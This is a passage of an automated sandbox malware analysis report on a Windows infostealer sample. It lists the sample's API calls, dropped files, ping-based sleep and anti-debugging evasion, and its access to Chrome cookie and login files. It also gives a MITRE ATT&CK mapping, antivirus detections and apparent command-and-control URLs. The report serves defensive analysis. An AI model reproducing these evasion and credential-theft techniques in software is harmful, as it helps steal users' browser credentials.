Source: C:\Users\user\Desktop\aOn5CfTiwS.exe	Code function: 0_2_0043B1BC SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,ShowWindow,	0_2_0043B1BC
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe	Code function: 0_2_0043F2BC PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,	0_2_0043F2BC

Source: C:\Users\user\AppData\Roaming\1612058829275.exe

Code function: 1_2_0040C41D GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

1_2_0040C41D

Source: C:\Users\user\AppData\Roaming\1612058829275.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion:

Uses ping.exe to sleep

Show sources

Source: unknown	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3			Jump to behavior

Source: C:\Users\user\Desktop\aOn5CfTiwS.exe

Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,

0_2_0043E268

Source: C:\Users\user\Desktop\aOn5CfTiwS.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll	Jump to dropped file
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\download_engine.dll	Jump to dropped file
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\msvcp71.dll	Jump to dropped file
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll	Jump to dropped file
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe	Jump to dropped file
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\zlib1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\atl71.dll	Jump to dropped file
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xldl.dll	Jump to dropped file

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	Binary or memory string: vmware
Source: aOn5CfTiwS.exe, 00000000.00000003.213585435.00000000022BB000.00000004.00000001.sdmp	Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}Local Print QueuePrintQueue
Source: aOn5CfTiwS.exe, 00000000.00000003.213567908.00000000022B2000.00000004.00000001.sdmp	Binary or memory string: NetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}CC?
Source: aOn5CfTiwS.exe, 00000000.00000003.213561044.0000000002DF6000.00000004.00000040.sdmp	Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}U
Source: ecv71A3.tmp.1.dr	Binary or memory string: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:472DC600-FEAB-E7F8-720D-1E33F00FD1E7&ctry=US&time=20200930T150347Z&lc=en-US&pl=en-US&idtp=mid&uid=4388269c-b420-4134-ac19-bc7ca8a19ac1&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=31fc4362adbf4e51ac951f4816f7487c&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=663703&metered=false&nettype=ethernet&npid=sc-314559&oemName=VMware%2C%20Inc.&oemid=VMware%2C%20Inc.&ossku=Professional&smBiosDm=VMware7%2C1&tl=2&tsu=663703&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=
Source: aOn5CfTiwS.exe, 00000000.00000003.213541122.00000000022EF000.00000004.00000001.sdmp	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: aOn5CfTiwS.exe, 00000000.00000003.213541122.00000000022EF000.00000004.00000001.sdmp	Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}Local Print QueuePrintQueueSWDMicrosoft Print to PDF{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	Binary or memory string: See collectCommentsallowCommentsstrictRootallowDroppedNullPlaceholdersallowNumericKeysallowSingleQuotesstackLimitfailIfExtrarejectDupKeysallowSpecialFloatscollectCommentsallowCommentsstrictRootallowDroppedNullPlaceholdersallowNumericKeysallowSingleQuotesstackLimitfailIfExtrarejectDupKeysallowSpecialFloatsallowCommentsstrictRootallowDroppedNullPlaceholdersallowNumericKeysallowSingleQuotesstackLimitfailIfExtrarejectDupKeysallowSpecialFloatscollectCommentsallowCommentsstrictRootallowDroppedNullPlaceholdersallowNumericKeysallowSingleQuotesstackLimitfailIfExtrarejectDupKeysallowSpecialFloatsError from reader: %sbad allocationsessionurls_to_restore_on_startuptabnew_open_urlbad allocationAfx:400000:8:10003:0:WPETCPViewClassTStdHttpAnalyzerFormgdkWindowToplevelXTPMainFrameHTTP DebuggerTelerik FiddlerASExplorerSunAwtFrameCharlesBurp Suitebad allocationvmwarevirtualvboxDisplayLegacyDriverDiskDriveCDROMMousebad allocation=> Send header=> Send data=> Send SSL data<= Recv header<= Recv data<= Recv SSL data[OnDebug] text = %s
Source: aOn5CfTiwS.exe, 00000000.00000003.213534311.00000000022DE000.00000004.00000001.sdmp	Binary or memory string: SWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}Local Print QueuePrintQueueSWDMicrosoft Print to PDF{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}

Source: C:\Users\user\AppData\Roaming\1612058829275.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe

Code function: 2_2_00951C57 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

2_2_00951C57

Source: C:\Users\user\AppData\Roaming\1612058829275.exe

Code function: 1_2_0040D071 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

1_2_0040D071

Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe

Code function: 2_2_00958290 GetProcessHeap,HeapFree,

2_2_00958290

Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 2_2_0095461F SetUnhandledExceptionFilter,	2_2_0095461F
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 2_2_00951C57 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00951C57
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 2_2_0095631F __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_0095631F
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 2_2_0095373A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_0095373A

HIPS / PFW / Operating System Protection Evasion:

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3

Jump to behavior

Language, Device and Operating System Detection:

Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe

Code function: GetLocaleInfoA,

2_2_00957189

Source: C:\Users\user\Desktop\aOn5CfTiwS.exe

Code function: 0_2_004A51E8 GetLocalTime,wsprintfA,

0_2_004A51E8

Source: C:\Users\user\Desktop\aOn5CfTiwS.exe

Code function: 0_2_004A52D8 GetVersion,GetCurrentThreadId,EnumThreadWindows,

0_2_004A52D8

Source: C:\Users\user\Desktop\aOn5CfTiwS.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\Desktop\aOn5CfTiwS.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies			Jump to behavior
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API1	Application Shimming1	Application Shimming1	Deobfuscate/Decode Files or Information1	OS Credential Dumping1	System Time Discovery1	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Ingress Tool Transfer1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Windows Service1	Windows Service1	Obfuscated Files or Information2	Input Capture2	System Information Discovery15	Remote Desktop Protocol	Data from Local System1	Exfiltration Over Bluetooth	Encrypted Channel1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Process Injection11	Install Root Certificate1	Security Account Manager	Security Software Discovery31	SMB/Windows Admin Shares	Screen Capture1	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Software Packing1	NTDS	Process Discovery3	Distributed Component Object Model	Input Capture2	Scheduled Transfer	Application Layer Protocol3	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Masquerading1	LSA Secrets	Application Window Discovery11	SSH	Clipboard Data1	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Process Injection11	Cached Domain Credentials	Remote System Discovery11	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	System Network Configuration Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
aOn5CfTiwS.exe	44%	Virustotal		Browse
aOn5CfTiwS.exe	27%	Metadefender		Browse
aOn5CfTiwS.exe	48%	ReversingLabs	Win32.Trojan.Phonzy
aOn5CfTiwS.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe	8%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	3%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	2%	ReversingLabs
C:\Users\user\AppData\Local\Temp\download\atl71.dll	3%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\download\atl71.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll	3%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\download\download_engine.dll	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\download\download_engine.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\download\msvcp71.dll	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\download\msvcp71.dll	3%	ReversingLabs
C:\Users\user\AppData\Local\Temp\download\msvcr71.dll	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\download\msvcr71.dll	3%	ReversingLabs
C:\Users\user\AppData\Local\Temp\download\zlib1.dll	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\download\zlib1.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\xldl.dll	3%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\xldl.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\1612058829275.exe	3%	Metadefender		Browse
C:\Users\user\AppData\Roaming\1612058829275.exe	14%	ReversingLabs	Win32.Infostealer.EdgeCookiesView

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
0.1.aOn5CfTiwS.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen		Download File

Domains

Source	Detection	Scanner	Label	Link
1a469593c1fe15dc.xyz	1%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
https://static.nc-img.com/uiraa/app.3c1b6a5a2612ad098ccd	0%	Avira URL Cloud	safe
https://www.messenger.comaccept-language:	0%	Avira URL Cloud	safe
http://1a469593c1fe15dc.xyz/info/fb	0%	Avira URL Cloud	safe
http://1a469593c1fe15dc.xyz/info/ddpxztN8b6xDUh	0%	Avira URL Cloud	safe
https://deff.nelreports.net/api/report?cat=msn	0%	Avira URL Cloud	safe
https://static.nc-img.com/pp/nc-ui-globalenv/museo-sans-700-webfont.b125dc012841fa8a23b98c37499ca5e8	0%	Avira URL Cloud	safe
http://www.interoperabilitybridges.com/wmp-extension-for-chrome	0%	URL Reputation	safe
http://www.interoperabilitybridges.com/wmp-extension-for-chrome	0%	URL Reputation	safe
http://www.interoperabilitybridges.com/wmp-extension-for-chrome	0%	URL Reputation	safe
http://ocsp.pki.goog/gts1o1core0	0%	URL Reputation	safe
http://ocsp.pki.goog/gts1o1core0	0%	URL Reputation	safe
http://ocsp.pki.goog/gts1o1core0	0%	URL Reputation	safe
http://crl.pki.goog/GTS1O1core.crl0	0%	URL Reputation	safe
http://crl.pki.goog/GTS1O1core.crl0	0%	URL Reputation	safe
http://crl.pki.goog/GTS1O1core.crl0	0%	URL Reputation	safe
http://1a469593c1fe15dc.xyz/info/stepstatus=0&L	0%	Avira URL Cloud	safe
http://ocsp.pki.goog/GTSGIAG30	0%	Avira URL Cloud	safe
https://static.nc-img.com/pp/nc-ui-globalenv/museo-sans-300-webfont.96dd56ebb50aa0150f6630360d8d69cf	0%	Avira URL Cloud	safe
https://logincdn.msauth.net/16.000/Converged_v21033_-0mnSwu67knBd7qR7YN9GQ2.css	0%	Avira URL Cloud	safe
https://logincdn.msauth.net/16.000.28666.10/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc1937	0%	Avira URL Cloud	safe
https://logincdn.msauth.net/16.000.28666.10/content/images/ellipsis_white_5ac590ee72bfe06a7cecfd75b5	0%	Avira URL Cloud	safe
http://1a469593c1fe15dc.xyz/info/stepmsn.com%2FB	0%	Avira URL Cloud	safe
https://static.nc	0%	Avira URL Cloud	safe
https://static.nc-img.com/uiraa/app.3c1b6a5a2612ad098ccd.js	0%	Avira URL Cloud	safe
http://1a469593c1fe15dc.xyz/info/step	0%	Avira URL Cloud	safe
http://pki.goog/gsr2/GTS1O1.crt0	0%	URL Reputation	safe
http://pki.goog/gsr2/GTS1O1.crt0	0%	URL Reputation	safe
http://pki.goog/gsr2/GTS1O1.crt0	0%	URL Reputation	safe
https://support.google.	0%	Avira URL Cloud	safe
http://ocsp.pki.goog/gsr202	0%	URL Reputation	safe
http://ocsp.pki.goog/gsr202	0%	URL Reputation	safe
http://ocsp.pki.goog/gsr202	0%	URL Reputation	safe
https://pki.goog/repository/0	0%	URL Reputation	safe
https://pki.goog/repository/0	0%	URL Reputation	safe
https://pki.goog/repository/0	0%	URL Reputation	safe
https://static.nc-img.com/uiraa/libs/polyfills_469970f8ffedace1b5b8	0%	Avira URL Cloud	safe
https://static.nc-img.com/pp/nc-ui-globalenv/museo-sans-500-webfont.5d9883d92e2eaa724e4e6beb0ef6728a	0%	Avira URL Cloud	safe
https://static.nc-img.com/pp/nc-ui-globalenv/mainLegacy.bb0357e72b1f882521990fd54c3c08d1.css	0%	Avira URL Cloud	safe
https://www.instagram.comreferer:	0%	Avira URL Cloud	safe
http://crl.pki.goog/gsr2/gsr2.crl0?	0%	URL Reputation	safe
http://crl.pki.goog/gsr2/gsr2.crl0?	0%	URL Reputation	safe
http://crl.pki.goog/gsr2/gsr2.crl0?	0%	URL Reputation	safe
https://static.nc-img.com/uiraa/app.ab29bfd164428d10f32bc34df1cad4ed.css	0%	Avira URL Cloud	safe
